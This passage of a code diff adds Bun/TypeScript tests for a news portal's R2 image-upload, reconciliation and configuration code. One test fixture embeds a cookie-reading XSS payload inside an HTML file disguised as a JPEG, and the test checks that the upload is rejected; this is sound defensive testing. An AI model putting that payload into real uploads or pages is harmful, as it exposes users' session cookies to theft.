+        return { ok: true, sizeExceeded: false, bytes: JPEG_BYTES };
+      },
+      listObjects: unusedListObjects,
+      deleteObject: unusedDeleteObject
+    };
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "size_exceeded" });
+    expect(getCalled).toBe(false);
+  });
+
+  test("HEAD reports in-bounds size but GET's actual read exceeds it (object swapped between HEAD and GET, PR #653 TOCTOU fix) -> rejected size_exceeded, authoritative over the stale HEAD", async () => {
+    const client = fakeClient({
+      head: { ok: true, exists: true, sizeBytes: 10 },
+      get: { ok: true, sizeExceeded: true }
+    });
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({ outcome: "rejected", reason: "size_exceeded" });
+  });
+
+  test("HEAD provider error -> provider_error, never mutates/decides content validity", async () => {
+    const client = fakeClient({ head: { ok: false, error: "boom" } });
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+    expect(result).toEqual({ outcome: "provider_error", error: "boom" });
+  });
+
+  test("GET provider error -> provider_error", async () => {
+    const client = fakeClient({ get: { ok: false, error: "get boom" } });
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+    expect(result).toEqual({ outcome: "provider_error", error: "get boom" });
+  });
+
+  test("real HTML-disguised-as-jpg payload (Issue #631 exploit) -> full GET happens, sniff fails, rejected", async () => {
+    const html = new TextEncoder().encode(
+      "<html><body><script>alert(document.cookie)</script></body></html>"
+    );
+    const client = fakeClient({
+      head: { ok: true, exists: true, sizeBytes: html.byteLength },
+      get: { ok: true, sizeExceeded: false, bytes: html }
+    });
+
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result).toEqual({
+      outcome: "rejected",
+      reason: "mime_not_recognized"
+    });
+  });
+
+  test("valid JPEG accepted, checksum computed server-side from the actually-read bytes", async () => {
+    const client = fakeClient({});
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: null
+    });
+
+    expect(result.outcome).toBe("accepted");
+    if (result.outcome === "accepted") {
+      expect(result.sizeBytes).toBe(JPEG_BYTES.byteLength);
+      const hasher = new Bun.CryptoHasher("sha256");
+      hasher.update(JPEG_BYTES);
+      expect(result.checksumSha256).toBe(hasher.digest("hex"));
+    }
+  });
+
+  test("claimed checksum mismatch (transport-corruption detection) rejects even with a valid MIME sniff", async () => {
+    const client = fakeClient({});
+    const result = await verifyNewsMediaR2Object(client, {
+      objectKey: "k",
+      claimedMimeType: "image/jpeg",
+      allowedMimeTypes: ALLOWED,
+      maxUploadBytes: MAX_BYTES,
+      claimedChecksumSha256: "0".repeat(64)
+    });
+
+    expect(result).toEqual({
+      outcome: "rejected",
+      reason: "checksum_mismatch"
+    });
+  });
+});

--- a/tests/news-media-reconciliation-categorization.test.ts
+++ b/tests/news-media-reconciliation-categorization.test.ts
@@ -1,0 +1,329 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  categorizeNewsMediaReconciliation,
+  isOrphanInR2EligibleForDeletion,
+  type NewsMediaReconciliationDbRow,
+  type NewsMediaReconciliationR2Object
+} from "../src/modules/news-portal/domain/news-media-reconciliation-categorization";
+
+const NOW = new Date("2026-07-12T00:00:00.000Z");
+const PENDING_TTL_MINUTES = 60;
+const ORPHAN_GRACE_DAYS = 30;
+
+function row(
+  overrides: Partial<NewsMediaReconciliationDbRow> & { objectKey: string }
+): NewsMediaReconciliationDbRow {
+  return {
+    id: overrides.objectKey,
+    status: "verified",
+    createdAt: NOW,
+    orphanedAt: null,
+    deletedAt: null,
+    ...overrides
+  };
+}
+
+function categorize(
+  dbRows: NewsMediaReconciliationDbRow[],
+  r2Objects: NewsMediaReconciliationR2Object[]
+) {
+  return categorizeNewsMediaReconciliation({
+    dbRows,
+    r2Objects,
+    now: NOW,
+    pendingTtlMinutes: PENDING_TTL_MINUTES,
+    orphanGraceDays: ORPHAN_GRACE_DAYS
+  });
+}
+
+describe("categorizeNewsMediaReconciliation (Issue #690)", () => {
+  test("healthy: an attached row whose object exists in R2", () => {
+    const result = categorize(
+      [row({ objectKey: "k1", status: "attached" })],
+      [{ key: "k1" }]
+    );
+
+    expect(result.healthy).toEqual([{ id: "k1", objectKey: "k1" }]);
+    expect(result.orphanInDb).toHaveLength(0);
+    expect(result.orphanInR2).toHaveLength(0);
+  });
+
+  test("orphan-in-db: an attached row whose object is missing from R2 — report only", () => {
+    const createdAt = new Date(NOW.getTime() - 5 * 24 * 60 * 60 * 1000);
+    const result = categorize(
+      [row({ objectKey: "k1", status: "attached", createdAt })],
+      []
+    );
+
+    expect(result.orphanInDb).toEqual([
+      { id: "k1", objectKey: "k1", status: "attached", ageDays: 5 }
+    ]);
+    expect(result.healthy).toHaveLength(0);
+  });
+
+  test("orphan-in-db never includes a pending_upload/failed/orphaned/deleted row (only uploaded/verified/attached)", () => {
+    const result = categorize(
+      [
+        row({ objectKey: "pending", status: "pending_upload" }),
+        row({ objectKey: "failed", status: "failed" }),
+        row({
+          objectKey: "orphaned",
+          status: "orphaned",
+          orphanedAt: NOW
+        }),
+        row({
+          objectKey: "deleted",
+          status: "attached",
+          deletedAt: NOW
+        })
+      ],
+      []
+    );
+
+    expect(result.orphanInDb).toHaveLength(0);
+  });
+
+  test("expired-pending: a pending_upload row past the TTL is included, a fresh one is not", () => {
+    const staleCreatedAt = new Date(
+      NOW.getTime() - (PENDING_TTL_MINUTES + 1) * 60_000
+    );
+    const freshCreatedAt = new Date(
+      NOW.getTime() - (PENDING_TTL_MINUTES - 1) * 60_000
+    );
+
+    const result = categorize(
+      [
+        row({
+          objectKey: "stale",
+          status: "pending_upload",
+          createdAt: staleCreatedAt
+        }),
+        row({
+          objectKey: "fresh",
+          status: "pending_upload",
+          createdAt: freshCreatedAt
+        })
+      ],
+      []
+    );
+
+    expect(result.expiredPending.map((entry) => entry.objectKey)).toEqual([
+      "stale"
+    ]);
+  });
+
+  test("expired-pending: includes 'uploaded' and already-'failed' rows past the TTL (retry-on-rerun)", () => {
+    const staleCreatedAt = new Date(
+      NOW.getTime() - (PENDING_TTL_MINUTES + 1) * 60_000
+    );
+
+    const result = categorize(
+      [
+        row({
+          objectKey: "uploaded-stale",
+          status: "uploaded",
+          createdAt: staleCreatedAt
+        }),
+        row({
+          objectKey: "failed-stale",
+          status: "failed",
+          createdAt: staleCreatedAt
+        })
+      ],
+      []
+    );
+
+    expect(
+      result.expiredPending.map((entry) => entry.objectKey).sort()
+    ).toEqual(["failed-stale", "uploaded-stale"]);
+  });
+
+  test("mutual exclusivity (security-auditor Medium finding on PR #718): a stale 'uploaded' row past the TTL is expiredPending ONLY — never simultaneously counted as healthy or orphan-in-db, even when its R2 object exists or is missing", () => {
+    const staleCreatedAt = new Date(
+      NOW.getTime() - (PENDING_TTL_MINUTES + 1) * 60_000
+    );
+
+    // Case A: R2 object present — would satisfy "healthy" if not excluded.
+    const withObject = categorize(
+      [
+        row({
+          objectKey: "uploaded-stale-with-object",
+          status: "uploaded",
+          createdAt: staleCreatedAt
+        })
+      ],
+      [{ key: "uploaded-stale-with-object" }]
+    );
+    expect(withObject.expiredPending.map((e) => e.objectKey)).toEqual([
+      "uploaded-stale-with-object"
+    ]);
+    expect(withObject.healthy).toHaveLength(0);
+    expect(withObject.orphanInDb).toHaveLength(0);
+
+    // Case B: R2 object missing — would satisfy "orphan-in-db" if not excluded.
+    const withoutObject = categorize(
+      [
+        row({
+          objectKey: "uploaded-stale-without-object",
+          status: "uploaded",
+          createdAt: staleCreatedAt
+        })
+      ],
+      []
+    );
+    expect(withoutObject.expiredPending.map((e) => e.objectKey)).toEqual([
+      "uploaded-stale-without-object"
+    ]);
+    expect(withoutObject.healthy).toHaveLength(0);
+    expect(withoutObject.orphanInDb).toHaveLength(0);
+  });
+
+  test("expired-pending never includes an already soft-deleted row", () => {
+    const staleCreatedAt = new Date(
+      NOW.getTime() - (PENDING_TTL_MINUTES + 1) * 60_000
+    );
+
+    const result = categorize(
+      [
+        row({
+          objectKey: "deleted-stale",
+          status: "pending_upload",
+          createdAt: staleCreatedAt,
+          deletedAt: NOW
+        })
+      ],
+      []
+    );
+
+    expect(result.expiredPending).toHaveLength(0);
+  });
+
+  test("stale-orphaned: an orphaned row past the grace period is included, a fresh one is not", () => {
+    const staleOrphanedAt = new Date(
+      NOW.getTime() - (ORPHAN_GRACE_DAYS + 1) * 24 * 60 * 60 * 1000
+    );
+    const freshOrphanedAt = new Date(
+      NOW.getTime() - (ORPHAN_GRACE_DAYS - 1) * 24 * 60 * 60 * 1000
+    );
+
+    const result = categorize(
+      [
+        row({
+          objectKey: "stale-orphan",
+          status: "orphaned",
+          orphanedAt: staleOrphanedAt
+        }),
+        row({
+          objectKey: "fresh-orphan",
+          status: "orphaned",
+          orphanedAt: freshOrphanedAt
+        })
+      ],
+      []
+    );
+
+    expect(result.staleOrphaned.map((entry) => entry.objectKey)).toEqual([
+      "stale-orphan"
+    ]);
+  });
+
+  test("orphan-in-r2: an R2 object with no matching DB row at all (any status) is flagged", () => {
+    const result = categorize(
+      [row({ objectKey: "tracked", status: "attached" })],
+      [{ key: "tracked" }, { key: "untracked", sizeBytes: 42 }]
+    );
+
+    expect(result.orphanInR2).toEqual([
+      { objectKey: "untracked", sizeBytes: 42, ageDays: null }
+    ]);
+  });
+
+  test("orphan-in-r2: a row in ANY status (even deleted/failed/orphaned) counts as tracked, not orphan-in-r2", () => {
+    const result = categorize(
+      [
+        row({ objectKey: "soft-deleted", status: "attached", deletedAt: NOW }),
+        row({ objectKey: "failed-row", status: "failed" }),
+        row({ objectKey: "orphaned-row", status: "orphaned", orphanedAt: NOW })
+      ],
+      [{ key: "soft-deleted" }, { key: "failed-row" }, { key: "orphaned-row" }]
+    );
+
+    expect(result.orphanInR2).toHaveLength(0);
+  });
+
+  test("orphan-in-r2: ageDays is computed from R2's own lastModified, not from any DB timestamp", () => {
+    const lastModified = new Date(
+      NOW.getTime() - 40 * 24 * 60 * 60 * 1000
+    ).toISOString();
+
+    const result = categorize([], [{ key: "untracked", lastModified }]);
+
+    expect(result.orphanInR2[0]?.ageDays).toBeCloseTo(40, 0);
+  });
+
+  test("orphan-in-r2: a missing/unparseable lastModified yields ageDays: null, never eligible for deletion", () => {
+    const result = categorize([], [{ key: "no-timestamp" }]);
+
+    expect(result.orphanInR2[0]?.ageDays).toBeNull();
+    expect(
+      isOrphanInR2EligibleForDeletion(result.orphanInR2[0]!, ORPHAN_GRACE_DAYS)
+    ).toBe(false);
+  });
+
+  test("isOrphanInR2EligibleForDeletion: true only once age reaches orphanGraceDays", () => {
+    const almostEligible = {
+      objectKey: "k",
+      ageDays: ORPHAN_GRACE_DAYS - 0.01
+    };
+    const eligible = { objectKey: "k", ageDays: ORPHAN_GRACE_DAYS };
+
+    expect(
+      isOrphanInR2EligibleForDeletion(almostEligible, ORPHAN_GRACE_DAYS)
+    ).toBe(false);
+    expect(isOrphanInR2EligibleForDeletion(eligible, ORPHAN_GRACE_DAYS)).toBe(
+      true
+    );
+  });
+
+  test("race condition: a row created moments before reconciliation runs is never miscategorized as orphan-in-r2", () => {
+    // Simulates: client calls createPendingNewsMediaObject() (INSERT) and
+    // completes the R2 PUT a moment before this run's DB snapshot + R2
+    // listing were taken — both now see the row/object as present.
+    const justCreated = new Date(NOW.getTime() - 1000);
+
+    const result = categorize(
+      [
+        row({
+          objectKey: "brand-new",
+          status: "uploaded",
+          createdAt: justCreated
+        })
+      ],
+      [{ key: "brand-new", lastModified: justCreated.toISOString() }]
+    );
+
+    expect(result.orphanInR2).toHaveLength(0);
+    expect(result.healthy).toEqual([
+      { id: "brand-new", objectKey: "brand-new" }
+    ]);
+    expect(result.expiredPending).toHaveLength(0);
+  });
+
+  test("idempotent: categorizing the same snapshot twice yields identical results", () => {
+    const dbRows = [
+      row({ objectKey: "a", status: "attached" }),
+      row({
+        objectKey: "b",
+        status: "pending_upload",
+        createdAt: new Date(NOW.getTime() - 10 * 60 * 60 * 1000)
+      })
+    ];
+    const r2Objects = [{ key: "a" }, { key: "c" }];
+
+    const first = categorize(dbRows, r2Objects);
+    const second = categorize(dbRows, r2Objects);
+
+    expect(second).toEqual(first);
+  });
+});

--- a/tests/news-media-upload-session-validation.test.ts
+++ b/tests/news-media-upload-session-validation.test.ts
@@ -1,0 +1,140 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  validateCreateNewsMediaUploadSessionInput,
+  validateFinalizeNewsMediaUploadSessionInput
+} from "../src/modules/news-portal/domain/news-media-upload-session-validation";
+
+const ALLOWED = ["image/jpeg", "image/png", "image/webp", "image/gif"];
+const MAX_BYTES = 10_485_760;
+
+describe("validateCreateNewsMediaUploadSessionInput (Issue #634)", () => {
+  test("valid minimal request", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/jpeg", byteSize: 1024 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result).toEqual({
+      valid: true,
+      value: {
+        mimeType: "image/jpeg",
+        byteSize: 1024,
+        originalFilename: null,
+        altText: null,
+        caption: null
+      }
+    });
+  });
+
+  test("normalizes mimeType casing/whitespace", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "  IMAGE/PNG  ", byteSize: 100 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(true);
+    expect(result.valid && result.value.mimeType).toBe("image/png");
+  });
+
+  test("rejects a mimeType outside the allow-list (e.g. image/svg+xml)", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/svg+xml", byteSize: 100 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+  });
+
+  test("rejects a byteSize larger than the configured max", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      { mimeType: "image/jpeg", byteSize: MAX_BYTES + 1 },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+    expect(
+      result.valid === false &&
+        result.errors.some((e) => e.field === "byteSize")
+    ).toBe(true);
+  });
+
+  test("rejects missing mimeType/byteSize", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      {},
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+    expect(result.valid === false && result.errors.length).toBe(2);
+  });
+
+  test("rejects a non-object body", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      null,
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(false);
+  });
+
+  test("accepts optional originalFilename/altText/caption, trims and treats blank as null", () => {
+    const result = validateCreateNewsMediaUploadSessionInput(
+      {
+        mimeType: "image/jpeg",
+        byteSize: 1,
+        originalFilename: "  photo.jpg  ",
+        altText: "   ",
+        caption: "A caption"
+      },
+      ALLOWED,
+      MAX_BYTES
+    );
+    expect(result.valid).toBe(true);
+    expect(result.valid && result.value.originalFilename).toBe("photo.jpg");
+    expect(result.valid && result.value.altText).toBeNull();
+    expect(result.valid && result.value.caption).toBe("A caption");
+  });
+});
+
+describe("validateFinalizeNewsMediaUploadSessionInput (Issue #634)", () => {
+  test("empty/absent body is valid (checksum is optional)", () => {
+    expect(validateFinalizeNewsMediaUploadSessionInput(null)).toEqual({
+      valid: true,
+      value: { checksumSha256: null }
+    });
+    expect(validateFinalizeNewsMediaUploadSessionInput({})).toEqual({
+      valid: true,
+      value: { checksumSha256: null }
+    });
+  });
+
+  test("accepts a well-formed 64-hex-char checksum, lowercased", () => {
+    const result = validateFinalizeNewsMediaUploadSessionInput({
+      checksumSha256: "A".repeat(64)
+    });
+    expect(result).toEqual({
+      valid: true,
+      value: { checksumSha256: "a".repeat(64) }
+    });
+  });
+
+  test("rejects a malformed checksum", () => {
+    expect(
+      validateFinalizeNewsMediaUploadSessionInput({
+        checksumSha256: "not-a-checksum"
+      }).valid
+    ).toBe(false);
+    expect(
+      validateFinalizeNewsMediaUploadSessionInput({
+        checksumSha256: "a".repeat(63)
+      }).valid
+    ).toBe(false);
+  });
+
+  test("rejects a non-object body", () => {
+    expect(validateFinalizeNewsMediaUploadSessionInput("nope").valid).toBe(
+      false
+    );
+  });
+});

--- a/tests/news-portal-module.test.ts
+++ b/tests/news-portal-module.test.ts
@@ -1,0 +1,130 @@
+import { describe, expect, test } from "bun:test";
+
+import { getModuleByKey, listModules } from "../src/modules";
+import { newsPortalModule } from "../src/modules/news-portal/module";
+import { NEWS_MEDIA_PERMISSIONS } from "../src/modules/news-portal/domain/news-media-permissions";
+
+describe("news_portal module descriptor (ported from awcms-mini)", () => {
+  test("listModules() includes news_portal", () => {
+    expect(listModules().some((m) => m.key === "news_portal")).toBe(true);
+    expect(getModuleByKey("news_portal")).toBe(newsPortalModule);
+  });
+
+  test("descriptor shape", () => {
+    expect(newsPortalModule.key).toBe("news_portal");
+    expect(newsPortalModule.status).toBe("active");
+    expect(newsPortalModule.type).toBe("domain");
+    // `module_management`/`logging` are foundation modules (never disabled
+    // per-tenant), so declaring them does not arm any reverse-dependency
+    // guard against an optional business module. blog_content/tenant_domain/
+    // visitor_analytics stay prose/capability-only, not lifecycle edges.
+    expect(newsPortalModule.dependencies).toEqual([
+      "tenant_admin",
+      "identity_access",
+      "module_management",
+      "logging"
+    ]);
+  });
+
+  test("PROVIDES news_media, CONSUMES blog_content's public_content", () => {
+    expect(newsPortalModule.capabilities?.provides).toEqual(["news_media"]);
+    expect(newsPortalModule.capabilities?.consumes).toEqual([
+      { capability: "public_content", providedBy: "blog_content" }
+    ]);
+  });
+
+  test("declares api + navigation + the reconcile job; settings/health undeclared", () => {
+    expect(newsPortalModule.settings).toBeUndefined();
+    expect(newsPortalModule.health).toBeUndefined();
+
+    expect(newsPortalModule.api).toEqual({
+      openApiPath: "openapi/awcms-public-api.openapi.yaml",
+      basePath: "/api/v1/media/news-images"
+    });
+
+    expect(newsPortalModule.jobs).toEqual([
+      {
+        command: "bun run news-media:reconcile",
+        purpose:
+          "Reconcile awcms_news_media_objects metadata against the real R2 bucket contents; clean up expired pending uploads and grace-period-expired orphans in bounded, race-safe batches (dry-run supported).",
+        recommendedSchedule: "Daily via cron/systemd timer.",
+        environmentNotes:
+          'No-op when NEWS_MEDIA_R2_ENABLED is not "true". Requires real network egress to the Cloudflare R2 API in addition to PostgreSQL — not a pure database operation.',
+        safeInOfflineLan: false
+      }
+    ]);
+
+    expect(newsPortalModule.navigation).toEqual([
+      {
+        labelKey: "admin.layout.nav_news_portal_homepage_sections",
+        path: "/admin/news-portal/homepage-sections",
+        order: 80,
+        requiredPermission: "news_portal.homepage_sections.read"
+      },
+      {
+        labelKey: "admin.layout.nav_news_portal_ad_placements",
+        path: "/admin/news-portal/ad-placements",
+        order: 81,
+        requiredPermission: "news_portal.ad_placements.read"
+      }
+    ]);
+
+    expect(newsPortalModule.permissions).toBeDefined();
+  });
+
+  test("every declared `media` activityCode permission reproduces exactly one NEWS_MEDIA_PERMISSIONS constant — no invented/duplicated/orphaned key", () => {
+    const permissions = (newsPortalModule.permissions ?? []).filter(
+      (p) => p.activityCode === "media"
+    );
+    const expectedKeys = new Set(Object.values(NEWS_MEDIA_PERMISSIONS));
+
+    expect(permissions.length).toBe(expectedKeys.size);
+
+    const declaredKeys = permissions.map(
+      (p) => `news_portal.${p.activityCode}.${p.action}`
+    );
+
+    expect(new Set(declaredKeys)).toEqual(expectedKeys);
+    expect(declaredKeys.length).toBe(new Set(declaredKeys).size);
+
+    for (const permission of permissions) {
+      expect(permission.description.length).toBeGreaterThan(0);
+    }
+  });
+
+  test("declares exactly the homepage_sections read/configure permission pair", () => {
+    const permissions = (newsPortalModule.permissions ?? []).filter(
+      (p) => p.activityCode === "homepage_sections"
+    );
+
+    expect(permissions.map((p) => p.action).sort()).toEqual([
+      "configure",
+      "read"
+    ]);
+  });
+
+  test("declares exactly the ad_placements read/configure permission pair", () => {
+    const permissions = (newsPortalModule.permissions ?? []).filter(
+      (p) => p.activityCode === "ad_placements"
+    );
+
+    expect(permissions.map((p) => p.action).sort()).toEqual([
+      "configure",
+      "read"
+    ]);
+  });
+
+  test("descriptor never declares a secret, token, or provider credential", () => {
+    const serialized = JSON.stringify(newsPortalModule).toLowerCase();
+
+    for (const forbidden of [
+      "password",
+      "secret",
+      "credential",
+      "apikey",
+      "api_key"
+    ]) {
+      expect(serialized).not.toContain(forbidden);
+    }
+  });
+});

--- a/tests/news-portal-no-local-fallback.test.ts
+++ b/tests/news-portal-no-local-fallback.test.ts
@@ -1,0 +1,89 @@
+/**
+ * Structural guard for Issue #632's acceptance criterion "Preset does not
+ * enable local filesystem uploads for news images." There is deliberately
+ * no `NEWS_MEDIA_LOCAL_FALLBACK_ENABLED`-style flag to check at runtime
+ * (see `news-portal-preset-readiness.ts`'s header comment) — this mode has
+ * structurally no local-fallback code path to disable.
+ *
+ * Issue #634 added the first real upload code (presigned upload session
+ * create/finalize/cancel) — its route handlers live under
+ * `src/pages/api/v1/media/news-images/` (Astro's file-based routing
+ * requires routes to live outside `src/modules/`), so this test now scans
+ * BOTH directories. Its job is to keep failing loudly the moment any PR
+ * introduces a local-disk write for news media bytes anywhere in either
+ * tree — see architecture doc §3.3/§3.4 and Keputusan kunci #2 in
+ * `.claude/skills/awcms-news-portal/SKILL.md`.
+ */
+import { describe, expect, test } from "bun:test";
+import { readdirSync, readFileSync, statSync } from "node:fs";
+import path from "node:path";
+
+const NEWS_PORTAL_SRC_DIR = path.join(
+  import.meta.dir,
+  "../src/modules/news-portal"
+);
+
+const NEWS_MEDIA_ROUTES_DIR = path.join(
+  import.meta.dir,
+  "../src/pages/api/v1/media/news-images"
+);
+
+const FORBIDDEN_PATTERNS = [
+  /Bun\.write\s*\(/,
+  /fs\.writeFile/,
+  /writeFileSync/,
+  /LOCAL_STORAGE_PATH/,
+  /FILE_STORAGE_DRIVER/,
+  /LOCAL_FILE_UPLOADS_ENABLED/,
+  /LOCAL_MEDIA_STORAGE_ENABLED/
+];
+
+function listTsFiles(dir: string): string[] {
+  const entries = readdirSync(dir);
+  const files: string[] = [];
+
+  for (const entry of entries) {
+    const fullPath = path.join(dir, entry);
+    const stat = statSync(fullPath);
+
+    if (stat.isDirectory()) {
+      files.push(...listTsFiles(fullPath));
+    } else if (entry.endsWith(".ts")) {
+      files.push(fullPath);
+    }
+  }
+
+  return files;
+}
+
+function findOffenders(rootDir: string, files: string[]): string[] {
+  const offenders: string[] = [];
+
+  for (const file of files) {
+    const content = readFileSync(file, "utf-8");
+
+    for (const pattern of FORBIDDEN_PATTERNS) {
+      if (pattern.test(content)) {
+        offenders.push(`${path.relative(rootDir, file)} matches ${pattern}`);
+      }
+    }
+  }
+
+  return offenders;
+}
+
+describe("news_portal module — no local filesystem fallback for news media", () => {
+  test("no source file under src/modules/news-portal writes bytes to local disk or references a local-upload flag", () => {
+    const files = listTsFiles(NEWS_PORTAL_SRC_DIR);
+    expect(files.length).toBeGreaterThan(0);
+
+    expect(findOffenders(NEWS_PORTAL_SRC_DIR, files)).toEqual([]);
+  });
+
+  test("no source file under src/pages/api/v1/media/news-images (Issue #634's upload-session routes) writes bytes to local disk or references a local-upload flag", () => {
+    const files = listTsFiles(NEWS_MEDIA_ROUTES_DIR);
+    expect(files.length).toBeGreaterThan(0);
+
+    expect(findOffenders(NEWS_MEDIA_ROUTES_DIR, files)).toEqual([]);
+  });
+});

--- a/tests/news-portal-preset-readiness.test.ts
+++ b/tests/news-portal-preset-readiness.test.ts
@@ -1,0 +1,113 @@
+import { describe, expect, test } from "bun:test";
+
+import {
+  evaluateNewsPortalFullOnlineR2Readiness,
+  isKnownNewsPortalProfile,
+  NEWS_PORTAL_PROFILES
+} from "../src/modules/news-portal/domain/news-portal-preset-readiness";
+
+const FULLY_CONFIGURED_ENV = {
+  NEWS_PORTAL_ENABLED: "true",
+  NEWS_PORTAL_PROFILE: "full_online_r2",
+  NEWS_MEDIA_R2_ENABLED: "true",
+  NEWS_MEDIA_R2_ACCOUNT_ID: "acct",
+  NEWS_MEDIA_R2_ACCESS_KEY_ID: "news-key",
+  NEWS_MEDIA_R2_SECRET_ACCESS_KEY: "news-secret",
+  NEWS_MEDIA_R2_BUCKET: "news-media-bucket",
+  NEWS_MEDIA_R2_PUBLIC_BASE_URL: "https://media.example.test"
+} as NodeJS.ProcessEnv;
+
+describe("isKnownNewsPortalProfile", () => {
+  test("accepts the one known profile", () => {
+    expect(isKnownNewsPortalProfile("full_online_r2")).toBe(true);
+  });
+
+  test("rejects unknown/undefined values", () => {
+    expect(isKnownNewsPortalProfile("offline_lan")).toBe(false);
+    expect(isKnownNewsPortalProfile(undefined)).toBe(false);
+  });
+
+  test("NEWS_PORTAL_PROFILES currently has exactly one value", () => {
+    expect(NEWS_PORTAL_PROFILES).toEqual(["full_online_r2"]);
+  });
+});
+
+describe("evaluateNewsPortalFullOnlineR2Readiness", () => {
+  test("ready when every condition holds", () => {
+    const result =
+      evaluateNewsPortalFullOnlineR2Readiness(FULLY_CONFIGURED_ENV);
+
+    expect(result.ready).toBe(true);
+    expect(result.reasons).toEqual([]);
+  });
+
+  test("not ready by default (empty env) — opt-in only, never a default", () => {
+    const result = evaluateNewsPortalFullOnlineR2Readiness(
+      {} as NodeJS.ProcessEnv
+    );
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toContain("news_portal_disabled");
+    expect(result.reasons).toContain("profile_not_full_online_r2");
+    expect(result.reasons).toContain("news_media_r2_disabled");
+  });
+
+  test("fails when NEWS_PORTAL_ENABLED is true but profile is wrong", () => {
+    const result = evaluateNewsPortalFullOnlineR2Readiness({
+      ...FULLY_CONFIGURED_ENV,
+      NEWS_PORTAL_PROFILE: "something_else"
+    } as NodeJS.ProcessEnv);
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toEqual(["profile_not_full_online_r2"]);
+  });
+
+  test("fails when news media R2 is disabled even if everything else is configured", () => {
+    const result = evaluateNewsPortalFullOnlineR2Readiness({
+      ...FULLY_CONFIGURED_ENV,
+      NEWS_MEDIA_R2_ENABLED: "false"
+    } as NodeJS.ProcessEnv);
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toEqual(["news_media_r2_disabled"]);
+  });
+
+  test("fails when a required NEWS_MEDIA_R2_* var is missing", () => {
+    const { NEWS_MEDIA_R2_BUCKET, ...rest } = FULLY_CONFIGURED_ENV as Record<
+      string,
+      string
+    >;
+
+    const result = evaluateNewsPortalFullOnlineR2Readiness(
+      rest as NodeJS.ProcessEnv
+    );
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toEqual(["news_media_r2_config_incomplete"]);
+    expect(result.detail[0]).toContain("NEWS_MEDIA_R2_BUCKET");
+  });
+
+  test("fails when news-media R2 bucket collides with sync-storage's R2_BUCKET (Keputusan kunci #1)", () => {
+    const result = evaluateNewsPortalFullOnlineR2Readiness({
+      ...FULLY_CONFIGURED_ENV,
+      R2_BUCKET: FULLY_CONFIGURED_ENV.NEWS_MEDIA_R2_BUCKET
+    } as NodeJS.ProcessEnv);
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toEqual([
+      "news_media_r2_shares_sync_storage_bucket_or_credentials"
+    ]);
+  });
+
+  test("fails when news-media R2 access key collides with sync-storage's R2_ACCESS_KEY_ID", () => {
+    const result = evaluateNewsPortalFullOnlineR2Readiness({
+      ...FULLY_CONFIGURED_ENV,
+      R2_ACCESS_KEY_ID: FULLY_CONFIGURED_ENV.NEWS_MEDIA_R2_ACCESS_KEY_ID
+    } as NodeJS.ProcessEnv);
+
+    expect(result.ready).toBe(false);
+    expect(result.reasons).toEqual([
+      "news_media_r2_shares_sync_storage_bucket_or_credentials"
+    ]);
+  });
+});

--- a/tests/openapi-bundle.test.ts
+++ b/tests/openapi-bundle.test.ts
@@ -273,10 +273,18 @@ describe("openapi bundle — contract equivalence to pre-migration monolith", ()
     );
     for (const name of beforeTags) expect(afterTags.has(name)).toBe(true);
     // The documented additive tags beyond the pre-migration monolith:
-    // "Domain Event Runtime" (a previously-undeclared operation tag) and
-    // "Theming" (ADR-0034 Fase 3 — the first website module in the base).
+    // "Domain Event Runtime" (a previously-undeclared operation tag),
+    // "Theming" (ADR-0034 Fase 3 — the first website module in the base), and
+    // the three "News *" tags owned by the ported news_portal module (R2 media
+    // registry/upload, editorial homepage sections, R2-only ad placements).
     const added = [...afterTags].filter((n) => !beforeTags.has(n)).sort();
-    expect(added).toEqual(["Domain Event Runtime", "Theming"]);
+    expect(added).toEqual([
+      "Domain Event Runtime",
+      "News Media",
+      "News Portal Ad Placements",
+      "News Portal Homepage Sections",
+      "Theming"
+    ]);
   });
 });
 

--- a/tests/social-preview-image-resolution.test.ts
+++ b/tests/social-preview-image-resolution.test.ts
@@ -1,0 +1,122 @@
+import { describe, expect, test } from "bun:test";
+
